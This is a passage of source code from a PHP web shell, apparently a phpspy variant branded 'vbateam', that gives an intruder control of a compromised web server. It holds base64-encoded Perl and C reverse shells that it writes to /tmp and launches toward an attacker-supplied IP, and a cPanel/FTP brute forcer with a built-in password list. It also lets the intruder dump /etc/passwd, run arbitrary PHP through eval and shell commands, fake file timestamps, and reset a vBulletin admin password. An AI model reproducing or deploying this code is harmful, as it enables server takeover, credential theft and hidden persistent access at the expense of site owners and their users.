776 !$dbport && $dbport = '3306';
777 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
778 if(isset($dbhost)){
779 $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
780 }
781 if(isset($dbuser)) {
782 $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
783 }
784 if(isset($dbpass)) {
785 $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
786 }
787 if(isset($dbport)) {
788 $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
789 }
790 if(isset($dbname)) {
791 $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
792 }
793 if(isset($charset)) {
794 $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
795 }
796
797 if ($doing == 'backupmysql' && $saveasfile) {
798 if (!$table) {
799 m('Please choose the table');
800 } else {
801 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
802 $table = array_flip($table);
803 $fp = @fopen($path,'w');
804 if ($fp) {
805 $result = q('SHOW tables');
806 if (!$result) p('<h2>'.mysql_error().'</h2>');
807 $mysqldata = '';
808 while ($currow = mysql_fetch_array($result)) {
809 if (isset($table[$currow[0]])) {
810 sqldumptable($currow[0], $fp);
811 }
812 }
813 fclose($fp);
814 $fileurl = str_replace(SA_ROOT,'',$path);
815 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
816 mysql_close();
817 } else {
818 m('Backup failed');
819 }
820 }
821 }
822 if ($insert && $insertsql) {
823 $keystr = $valstr = $tmp = '';
824 foreach($insertsql as $key => $val) {
825 if ($val) {
826 $keystr .= $tmp.$key;
827 $valstr .= $tmp."'".addslashes($val)."'";
828 $tmp = ',';
829 }
830 }
831 if ($keystr && $valstr) {
832 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
833 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
834 }
835 }
836 if ($update && $insertsql && $base64) {
837 $valstr = $tmp = '';
838 foreach($insertsql as $key => $val) {
839 $valstr .= $tmp.$key."='".addslashes($val)."'";
840 $tmp = ',';
841 }
842 if ($valstr) {
843 $where = base64_decode($base64);
844 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
845 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
846 }
847 }
848 if ($doing == 'del' && $base64) {
849 $where = base64_decode($base64);
850 $delete_sql = "DELETE FROM $tablename WHERE $where";
851 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
852 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
853 }
854
855 if ($tablename && $doing == 'drop') {
856 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
857 if (q("DROP TABLE $tablename")) {
858 m('Drop table of success');
859 $tablename = '';
860 } else {
861 m(mysql_error());
862 }
863 }
864
865 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
866
867 formhead(array('title'=>'MYSQL Manager'));
868 makehide('action','sqladmin');
869 p('<p>');
870 p('DBHost:');
871 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
872 p(':');
873 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
874 p('DBUser:');
875 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
876 p('DBPass:');
877 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
878 p('DBCharset:');
879 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
880 makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
881 p('</p>');
882 formfoot();
883?>
884<script type="text/javascript">
885function editrecord(action, base64, tablename){
886 if (action == 'del') {
887 if (!confirm('Is or isn\'t deletion record?')) return;
888 }
889 $('recordlist').doing.value=action;
890 $('recordlist').base64.value=base64;
891 $('recordlist').tablename.value=tablename;
892 $('recordlist').submit();
893}
894function moddbname(dbname) {
895 if(!dbname) return;
896 $('setdbname').dbname.value=dbname;
897 $('setdbname').submit();
898}
899function settable(tablename,doing,page) {
900 if(!tablename) return;
901 if (doing) {
902 $('settable').doing.value=doing;
903 }
904 if (page) {
905 $('settable').page.value=page;
906 }
907 $('settable').tablename.value=tablename;
908 $('settable').submit();
909}
910</script>
911<?php
912 // SQL
913 formhead(array('name'=>'recordlist'));
914 makehide('doing');
915 makehide('action','sqladmin');
916 makehide('base64');
917 makehide('tablename');
918 p($dbform);
919 formfoot();
920
921 // Data
922 formhead(array('name'=>'setdbname'));
923 makehide('action','sqladmin');
924 p($dbform);
925 if (!$dbname) {
926 makehide('dbname');
927 }
928 formfoot();
929
930
931 formhead(array('name'=>'settable'));
932 makehide('action','sqladmin');
933 p($dbform);
934 makehide('tablename');
935 makehide('page',$page);
936 makehide('doing');
937 formfoot();
938
939 $cachetables = array();
940 $pagenum = 30;
941 $page = intval($page);
942 if($page) {
943 $start_limit = ($page - 1) * $pagenum;
944 } else {
945 $start_limit = 0;
946 $page = 1;
947 }
948 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
949 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
950 // get mysql server
951 $mysqlver = mysql_get_server_info();
952 p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
953 $highver = $mysqlver > '4.1' ? 1 : 0;
954
955 // Show database
956 $query = q("SHOW DATABASES");
957 $dbs = array();
958 $dbs[] = '-- Select a database --';
959 while($db = mysql_fetch_array($query)) {
960 $dbs[$db['Database']] = $db['Database'];
961 }
962 makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
963 $tabledb = array();
964 if ($dbname) {
965 p('<p>');
966 p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
967 if ($tablename) {
968 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
969 }
970 p('</p>');
971 mysql_select_db($dbname);
972
973 $getnumsql = '';
974 $runquery = 0;
975 if ($sql_query) {
976 $runquery = 1;
977 }
978 $allowedit = 0;
979 if ($tablename && !$sql_query) {
980 $sql_query = "SELECT * FROM $tablename";
981 $getnumsql = $sql_query;
982 $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
983 $allowedit = 1;
984 }
985 p('<form action="'.$self.'" method="POST">');
986 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>'.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
987 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
988 makehide('tablename', $tablename);
989 makehide('action','sqladmin');
990 p($dbform);
991 p('</form>');
992 if ($tablename || ($runquery && $sql_query)) {
993 if ($doing == 'structure') {
994 $result = q("SHOW COLUMNS FROM $tablename");
995 $rowdb = array();
996 while($row = mysql_fetch_array($result)) {
997 $rowdb[] = $row;
998 }
999 p('<table border="0" cellpadding="3" cellspacing="0">');
1000 p('<tr class="head">');
1001 p('<td>Field</td>');
1002 p('<td>Type</td>');
1003 p('<td>Null</td>');
1004 p('<td>Key</td>');
1005 p('<td>Default</td>');
1006 p('<td>Extra</td>');
1007 p('</tr>');
1008 foreach ($rowdb as $row) {
1009 $thisbg = bg();
1010 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1011 p('<td>'.$row['Field'].'</td>');
1012 p('<td>'.$row['Type'].'</td>');
1013 p('<td>'.$row['Null'].' </td>');
1014 p('<td>'.$row['Key'].' </td>');
1015 p('<td>'.$row['Default'].' </td>');
1016 p('<td>'.$row['Extra'].' </td>');
1017 p('</tr>');
1018 }
1019 tbfoot();
1020 } elseif ($doing == 'insert' || $doing == 'edit') {
1021 $result = q('SHOW COLUMNS FROM '.$tablename);
1022 while ($row = mysql_fetch_array($result)) {
1023 $rowdb[] = $row;
1024 }
1025 $rs = array();
1026 if ($doing == 'insert') {
1027 p('<h2>Insert new line in '.$tablename.' table »</h2>');
1028 } else {
1029 p('<h2>Update record in '.$tablename.' table »</h2>');
1030 $where = base64_decode($base64);
1031 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1032 $rs = mysql_fetch_array($result);
1033 }
1034 p('<form method="post" action="'.$self.'">');
1035 p($dbform);
1036 makehide('action','sqladmin');
1037 makehide('tablename',$tablename);
1038 p('<table border="0" cellpadding="3" cellspacing="0">');
1039 foreach ($rowdb as $row) {
1040 if ($rs[$row['Field']]) {
1041 $value = htmlspecialchars($rs[$row['Field']]);
1042 } else {
1043 $value = '';
1044 }
1045 $thisbg = bg();
1046 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1047 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1048 }
1049 if ($doing == 'insert') {
1050 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1051 } else {
1052 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1053 makehide('base64', $base64);
1054 }
1055 p('</table></form>');
1056 } else {
1057 $querys = @explode(';',$sql_query);
1058 foreach($querys as $num=>$query) {
1059 if ($query) {
1060 p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1061 switch(qy($query))
1062 {
1063 case 0:
1064 p('<h2>Error : '.mysql_error().'</h2>');
1065 break;
1066 case 1:
1067 if (strtolower(substr($query,0,13)) == 'select * from') {
1068 $allowedit = 1;
1069 }
1070 if ($getnumsql) {
1071 $tatol = mysql_num_rows(q($getnumsql));
1072 $multipage = multi($tatol, $pagenum, $page, $tablename);
1073 }
1074 if (!$tablename) {
1075 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1076 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1077 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
1078 $tablename = $matches[1][0];
1079 }
1080 $result = q($query);
1081 p($multipage);
1082 p('<table border="0" cellpadding="3" cellspacing="0">');
1083 p('<tr class="head">');
1084 if ($allowedit) p('<td>Action</td>');
1085 $fieldnum = @mysql_num_fields($result);
1086 for($i=0;$i<$fieldnum;$i++){
1087 $name = @mysql_field_name($result, $i);
1088 $type = @mysql_field_type($result, $i);
1089 $len = @mysql_field_len($result, $i);
1090 p("<td nowrap>$name<br><span>$type($len)</span></td>");
1091 }
1092 p('</tr>');
1093 while($mn = @mysql_fetch_assoc($result)){
1094 $thisbg = bg();
1095 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1096 $where = $tmp = $b1 = '';
1097 foreach($mn as $key=>$inside){
1098 if ($inside) {
1099 $where .= $tmp.$key."='".addslashes($inside)."'";
1100 $tmp = ' AND ';
1101 }
1102 $b1 .= '<td nowrap>'.html_clean($inside).' </td>';
1103 }
1104 $where = base64_encode($where);
1105 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
1106 p($b1);
1107 p('</tr>');
1108 unset($b1);
1109 }
1110 tbfoot();
1111 p($multipage);
1112 break;
1113 case 2:
1114 $ar = mysql_affected_rows();
1115 p('<h2>affected rows : <b>'.$ar.'</b></h2>');
1116 break;
1117 }
1118 }
1119 }
1120 }
1121 } else {
1122 $query = q("SHOW TABLE STATUS");
1123 $table_num = $table_rows = $data_size = 0;
1124 $tabledb = array();
1125 while($table = mysql_fetch_array($query)) {
1126 $data_size = $data_size + $table['Data_length'];
1127 $table_rows = $table_rows + $table['Rows'];
1128 $table['Data_length'] = sizecount($table['Data_length']);
1129 $table_num++;
1130 $tabledb[] = $table;
1131 }
1132 $data_size = sizecount($data_size);
1133 unset($table);
1134 p('<table border="0" cellpadding="0" cellspacing="0">');
1135 p('<form action="'.$self.'" method="POST">');
1136 makehide('action','sqladmin');
1137 p($dbform);
1138 p('<tr class="head">');
1139 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1140 p('<td>Name</td>');
1141 p('<td>Rows</td>');
1142 p('<td>Data_length</td>');
1143 p('<td>Create_time</td>');
1144 p('<td>Update_time</td>');
1145 if ($highver) {
1146 p('<td>Engine</td>');
1147 p('<td>Collation</td>');
1148 }
1149 p('</tr>');
1150 foreach ($tabledb as $key => $table) {
1151 $thisbg = bg();
1152 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1153 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1154 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
1155 p('<td>'.$table['Rows'].'</td>');
1156 p('<td>'.$table['Data_length'].'</td>');
1157 p('<td>'.$table['Create_time'].'</td>');
1158 p('<td>'.$table['Update_time'].'</td>');
1159 if ($highver) {
1160 p('<td>'.$table['Engine'].'</td>');
1161 p('<td>'.$table['Collation'].'</td>');
1162 }
1163 p('</tr>');
1164 }
1165 p('<tr class=fout>');
1166 p('<td> </td>');
1167 p('<td>Total tables: '.$table_num.'</td>');
1168 p('<td>'.$table_rows.'</td>');
1169 p('<td>'.$data_size.'</td>');
1170 p('<td colspan="'.($highver ? 4 : 2).'"> </td>');
1171 p('</tr>');
1172
1173 p("<tr class=\"fout\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1174 makehide('doing','backupmysql');
1175 formfoot();
1176 p("</table>");
1177 fr($query);
1178 }
1179 }
1180 }
1181 tbfoot();
1182 @mysql_close();
1183}//end sql backup
1184
1185
1186elseif ($action == 'backconnect') {
1187 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1188 !$yourport && $yourport = '12345';
1189 $usedb = array('perl'=>'perl','c'=>'c');
1190
1191 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1192 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1193 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1194 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1195 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1196 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1197 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1198 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1199 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1200 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1201 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1202 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1203 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1204 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1205 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1206
1207 if ($start && $yourip && $yourport && $use){
1208 if ($use == 'perl') {
1209 cf('/tmp/angel_bc',$back_connect);
1210 $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1211 } else {
1212 cf('/tmp/angel_bc.c',$back_connect_c);
1213 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1214 @unlink('/tmp/angel_bc.c');
1215 $res = execute("/tmp/angel_bc $yourip $yourport &");
1216 }
1217 m("Now script try connect to $yourip port $yourport ...");
1218 }
1219
1220 formhead(array('title'=>'Back Connect'));
1221 makehide('action','backconnect');
1222 p('<p>');
1223 p('Your IP:');
1224 makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1225 p('Your Port:');
1226 makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1227 p('Use:');
1228 makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1229 makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1230 p('</p>');
1231 formfoot();
1232}//end backconnect window via NC
1233
1234// Brute
1235elseif ($action == 'brute') {
1236formhead(array('title'=>'Brute Forcer'));
1237 makehide('action','brute');
1238 makehide('dir',$brute);
1239@ini_set('memory_limit', 1000000000000);
1240$connect_timeout=5;
1241@set_time_limit(0);
1242$submit = $_REQUEST['submit'];
1243$users = $_REQUEST['users'];
1244$pass = $_REQUEST['passwords'];
1245$target = $_REQUEST['target'];
1246$option = $_REQUEST['option'];
1247
1248
1249$passlist = "0123456
125001234567
1251012345678
12520123456789
125301234567890
1254123456
12551234567
125612345678
1257123456789
12581234567890
1259111111
1260000000
1261222222
1262333333
1263444444
1264555555
1265666666
1266777777
1267888888
1268999999
1269123123
1270456456
1271789789
1272123321
1273456654
1274654321
12757654321
127687654321
1277987654321
12780987654321
1279admin
1280administrator
1281admincp
1282cpanel
1283adminx
1284admins
1285password
1286passwords
1287passw0rd
1288p@ssw0rd
1289p@ssword
1290khongco
129125251325
1292passw0rds";
1293if($target == ''){
1294$target = 'localhost';
1295}
1296print " <div align='center'>
1297<form method='post' style='border: 1px solid #000000'><br><br>
1298<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1299<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1300<div align='center'><br>
1301<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1302<tr>
1303<td align='center'>
1304<b>Username</b></td>
1305<td>
1306<p align='center'>
1307<b>Password</b></td>
1308</tr>
1309</table>
1310<p align='center'>
1311<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1312$i = 0;
1313while ($i < 60000) {
1314
1315 $line = posix_getpwuid($i);
1316 if (!empty($line)) {
1317
1318 while (list ($key, $vba_etcpwd) = each($line)){
1319 echo "".$vba_etcpwd."\n";
1320 break;
1321 }
1322
1323 }
1324
1325 $i++;
1326}
1327echo "
1328</textarea>
1329<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1330<br>
1331<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1332<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1333</td></tr></table></td></tr></form><p align= 'left'>";
1334?>
1335<?php
1336function ftp_check($host,$user,$pass,$timeout){
1337$ch = curl_init();
1338curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1339curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1340curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1341curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1342curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1343curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1344curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1345$data = curl_exec($ch);
1346if ( curl_errno($ch) == 28 ) {
1347
1348print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1349exit;}
1350
1351elseif ( curl_errno($ch) == 0 ){
1352
1353p("<b>[ attack@vbateam.net ]# </b>
1354<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1355}
1356curl_close($ch);}
1357
1358function cpanel_check($host,$user,$pass,$timeout){
1359$ch = curl_init();
1360curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1361curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1362curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1363curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1364curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1365curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1366$data = curl_exec($ch);
1367if ( curl_errno($ch) == 28 ) {
1368print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1369exit;}
1370elseif ( curl_errno($ch) == 0 ){
1371
1372p("<b>[ attack@vbateam.net ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");}curl_close($ch);}
1373
1374if(isset($submit) && !empty($submit)){
1375
1376$userlist = explode ("\n" , $users );
1377$passlist = explode ("\n" , $pass );
1378p('<b>[ attack@vbateam.net ]# Attacking ...</font></b><br>');
1379foreach ($userlist as $user) {
1380$_user = trim($user);
1381foreach ($passlist as $password ) {
1382$_pass = trim($password);
1383if($option == "ftp"){
1384ftp_check($target,$_user,$_pass,$connect_timeout);
1385}
1386if ($option == "cpanel")
1387{
1388cpanel_check($target,$_user,$_pass,$connect_timeout);
1389}
1390}
1391}
1392}
1393
1394 formfoot();
1395}
1396
1397
1398
1399
1400
1401
1402elseif ($action == 'etcpwd') {
1403formhead(array('title'=>'Get /etc/passwd'));
1404 makehide('action','etcpwd');
1405 makehide('dir',$nowpath);
1406$i = 0;
1407 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1408while ($i < 60000) {
1409
1410 $line = posix_getpwuid($i);
1411 if (!empty($line)) {
1412
1413 while (list ($key, $vba_etcpwd) = each($line)){
1414 echo "".$vba_etcpwd."\n";
1415 break;
1416 }
1417
1418 }
1419
1420 $i++;
1421}
1422 echo "</textarea></p>";
1423 formfoot();
1424}
1425
1426elseif ($action == 'eval') {
1427 $phpcode = trim($phpcode);
1428 if($phpcode){
1429 if (!preg_match('#<\?#si', $phpcode)) {
1430 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1431 }
1432 eval("?".">$phpcode<?");
1433 }
1434 formhead(array('title'=>'Eval PHP Code'));
1435 makehide('action','eval');
1436 maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
1437 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1438 formfooter();
1439}//end eval
1440
1441elseif ($action == 'editfile') {
1442 if(file_exists($opfile)) {
1443 $fp=@fopen($opfile,'r');
1444 $contents=@fread($fp, filesize($opfile));
1445 @fclose($fp);
1446 $contents=htmlspecialchars($contents);
1447 }
1448 formhead(array('title'=>'Create / Edit File'));
1449 makehide('action','file');
1450 makehide('dir',$nowpath);
1451 makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1452 maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1453 formfooter();
1454}//end editfile
1455
1456elseif ($action == 'newtime') {
1457 $opfilemtime = @filemtime($opfile);
1458 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1459 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1460 formhead(array('title'=>'Clone file was last modified time'));
1461 makehide('action','file');
1462 makehide('dir',$nowpath);
1463 makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1464 makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1465 formfooter();
1466 formhead(array('title'=>'Set last modified'));
1467 makehide('action','file');
1468 makehide('dir',$nowpath);
1469 makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1470 p('<p>Instead »');
1471 p('year:');
1472 makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1473 p('month:');
1474 makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1475 p('day:');
1476 makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1477 p('hour:');
1478 makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1479 p('minute:');
1480 makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1481 p('second:');
1482 makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1483 p('</p>');
1484 formfooter();
1485}//end newtime
1486
1487elseif ($action == 'shell') {
1488 if (IS_WIN && IS_COM) {
1489 if($program && $parameter) {
1490 $shell= new COM('Shell.Application');
1491 $a = $shell->ShellExecute($program,$parameter);
1492 m('Program run has '.(!$a ? 'success' : 'fail'));
1493 }
1494 !$program && $program = 'c:\windows\system32\cmd.exe';
1495 !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1496 formhead(array('title'=>'Execute Program'));
1497 makehide('action','shell');
1498 makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1499 p('<p>');
1500 makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1501 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1502 p('</p>');
1503 formfoot();
1504 }
1505 formhead(array('title'=>'Execute Command'));
1506 makehide('action','shell');
1507 if (IS_WIN && IS_COM) {
1508 $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1509 makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1510 }
1511 p('<p>');
1512 makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
